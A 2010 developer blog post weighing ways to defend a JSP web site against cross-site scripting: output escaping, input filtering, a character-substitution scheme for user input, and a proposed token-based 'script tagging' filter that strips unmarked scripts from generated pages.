Saturday, October 2, 2010

Practical XSS defense

This blog has been quiet lately.  I've been working on the nuts and bolts of what we[1] hope will eventually be a major web site, and that hasn't lent itself to the sort of material I want here.  I'm trying to post only when I have something at least mildly novel and meaty to talk about -- as opposed to, say, photos from my three-day trip to the land of Tomcat configuration.  We're starting to get past the boilerplate into more interesting work, so I hope to start posting more often again.

One thing I set out to tackle this week is XSS defense.  Traditionally, it's a tedious and error-prone task.  In this post, I'll present an attempt to improve on this.

Wikipedia provides a good introduction to the subject.  As a brief refresher, XSS (Cross-Site Scripting) is an attack where a malicious user enters deliberately malformed data into your system.  If your site is not properly protected, it may display that data on a web page in such a way that the browser interprets it as JavaScript code, allowing the attacker to take control of the browser of any victim who views the page.

Escaping

There are a variety of defenses against XSS.  The most common is escaping -- transforming the data in such a way that the browser will not interpret it as code.  For instance, when including a user-supplied value in a web page, characters like "<" and "&" should be rewritten as HTML entities -- "&lt;" and "&amp;".  Old hat, probably, to most of you reading this.

Escaping, if done correctly, is a solid defense against XSS.  However, getting it right is notoriously difficult.  You must apply the escaping in every single place where your code inserts user-supplied data into a web page.  That can easily be thousands of locations.  Miss a single one, and your site is vulnerable.  It's sometimes necessary to perform the encoding at different levels in the code, making it hard to keep track of which strings have already been encoded.  Worse yet, different sorts of encoding are needed depending on context: HTML entity encoding, URL encoding, backslash encoding, etc.  I've even seen cases where two levels of encoding were needed -- for instance, when a value is included in a JavaScript string literal, and the JavaScript code later places that string in the innerHtml of some DOM node.  If you get the encoding wrong, you may again be vulnerable.

Escaping also tends to uglify your code.  In JSP, <%= username %> might have to become <%= Escaper.entityEncode(userName) %>.  The impact on code readability and maintainability is nontrivial.  Some templating systems handle this better than others; we're using plain 'ol JSP, which offers no special support.  So, we weren't very enthusiastic about this approach.

Validation and filtering

Another well-known defense is to validate and/or filter your input: disallow users from entering special characters like <, or filter out those characters.  If these characters never enter your system, you don't have to worry about escaping them at output time.

Most web sites have fewer inputs than outputs, so airtight input filtering is easier to achieve than airtight output escaping.  Also, a single filter can render data safe for inclusion in a variety of contexts, unlike output escaping where you have to be careful to use the correct escaping mode according to context.  (Though this requires a broadminded definition of "special characters" -- see this link for a discussion.)

Input filtering does have some drawbacks.  Most notably, it is visible to users.  Some dangerous characters, like ' and &, appear frequently in ordinary situations, and users will be annoyed if they can't use them.  For this reason, filtering is most commonly used for specific data types, such phone numbers, rather than free-form text such as a message subject.

Another drawback of input filtering is that, if you find a bug in your input filter, you have to re-validate all existing data.  That can be a huge burden in practice, especially if you're under time pressure to close a security hole.  With output escaping, as soon as you fix the bug and push a new build, you're protected.

Design criteria

We're building an actual web site; rubber is meeting road.  Theory aside, we need a concrete plan for XSS defense.  Ideally, the solution would satisfy the following criteria:
  • Easy to use -- no complex rules to be remembered while coding.
  • Minimal impact on code readability and maintainability.
  • Works with JSP (our current templating system), and portable to other templating systems.
  • Little or no user-visible impact.
  • Auditability -- it should be possible to scan the code with an automated tool and identify any possible XSS holes.
  • Defense in depth -- multiple, independent / redundant mechanisms preventing XSS exploits.
Also, I'd like a pony.  (Well, not really.  One of these, maybe.)  Output escaping fails on ease of use, and is difficult to audit; input filtering fails on user impact, and by itself does not provide defense in depth.  Time to get creative.

Input transformation

Again, one problem with input filtering is that it can cause serious annoyance to users.  As noted in one of the pages linked above, imagine poor Mr. O'Malley's frustration when he can't type the ' in his name.

What if, instead of forbidding dangerous characters, we replace them with safer substitutes?  The most common offender, the single quote, has a very acceptable substitute -- the curved single quotes,  and .  When we process a form submission, we could perform this substitution automatically.  Mr. O'Malley might not even notice that he's now Mr. O’Malley, and if he did notice, he probably wouldn’t mind.

This appeals to me.  The main objection to input filtering is the impact on users, and this mitigates that impact.  The impact is not eliminated completely, so this won't work in all situations.  But in our application, it should be usable for almost all inputs.

The mapping I'm currently envisioning is as follows:

  '  ->  ‘ or ’ (depending on context)
  "  ->  “ or ” (depending on context)
  <  ->  (
  >  ->  )
  &  ->  +
  \  ->  /

This isn't sufficient in every situation.  For instance, URLs need a different input transformation -- the mapping above will break some URLs, and doesn't rule out "javascript:" or other dangerous links.  And no reasonable input transformation will suffice if you include user-supplied values in an unquoted tag attribute -- quoting is essential.  But if you're good about quoting, this transformation suffices for most common situations.  And it scores pretty well on my "I want a pony" design criteria:
  • Ease of use: simply replace every instance of request.getParameter("name") with something like XssUtil.getSafe(request, "name").  (With exceptions only for those unusual cases where the transformation is not acceptable.)
  • Impact on code readability: the new form is not especially bulkier than the old.
  • Template compatibility: input transformation has no impact on the templating system.
  • Auditability: it's easy to grep your codebase for unprotected calls to getParameter.
That leaves only user impact, which I've discussed; and defense in depth.  Defense in depth brings me to my next topic.

Script tagging

Most approaches to XSS defense involve enumerating, and protecting, every spot on a page where scripts might creep in.  The idea is for the page to be "clean" as it emerges from the templating system.  As we've seen above, that's difficult.

Instead, let's accept that a malicious script might sneak into the generated page.  If we have a whitelist of places where scripts are supposed to appear, we could filter out any unwanted ones.  This would work as follows:

1. Tag all "good" scripts -- scripts that we're deliberately including in the page -- with a special marker.  In JSP, the coding idiom might be something like this:

  <script language=javascript>
    <%= scriptToken() %>
    ...regular JavaScript code here...
  </script>

It's important that an attacker not be able to guess the special marker.  This is easily ensured by generating a random marker for each request.

2. After the templating system executes, run the generated page through an HTML parser to identify all scripts on the page.  (For this to be robust, we'll actually need an HTML "cleaner" that rewrites the page in a way that all browsers can be trusted to parse properly.)  Here, "all scripts" means all constructs that could trigger undesired actions in the browser: <script> tags, <style> tags, onclick handlers, URLs with protocols other than http/https/mailto, etc.  Like any HTML cleaner, the system should be based on a whitelist -- any tag or attribute not in the whitelist is considered dangerous.

3. Whenever we see a script with the special marker, remove the marker and leave the script alone.  If we see any scripts without the marker, strip them out, and flag the page for manual inspection.

I don't recall seeing this approach suggested before, but at first blush it seems sound to me.  Of course, browsers are complicated beasts, and I may be missing something.  If you can poke a hole, please let me know!

This approach does impose processing overhead, to parse each generated page.  However, cycles are cheap nowadays; security holes are expensive, as is programmer time.  Also, the same processing pass can perform other useful functions, such as HTML minification.  How does the approach stack up on my design criteria?
  • Easy of use: pretty good.  It only requires adding a bit of boilerplate at the beginning of every script block; in practice, it might look something like <%= scriptToken() %>.
  • Code impact: the token is not a big deal for a script block.  It will be more annoying in something small like an onclick handler.
  • Template compatibility: inserting a token should be easy in any templating system.
  • User impact: none.
  • Auditability: excellent.  Runtime reporting of marker-less scripts makes the system self-auditing.
  • Defense in depth: this approach is completely independent of input transformation, so combining the two achieves a layered defense.  It could also be combined with traditional output escaping.
Conclusions

The combination of input transformation and script tagging yields a layered, auditable defense against XSS attacks, with less programming burden than traditional output escaping.  Output escaping will still be needed in a few places where input transformation is impractical, such as when embedding a user-supplied value in a URL.

If there is interest, I might take the time to open-source this code once when it's completed.

Notes

[1] My old partners in crime from Writely, Sam Schillace and Claudia Carpenter

No comments:

Post a Comment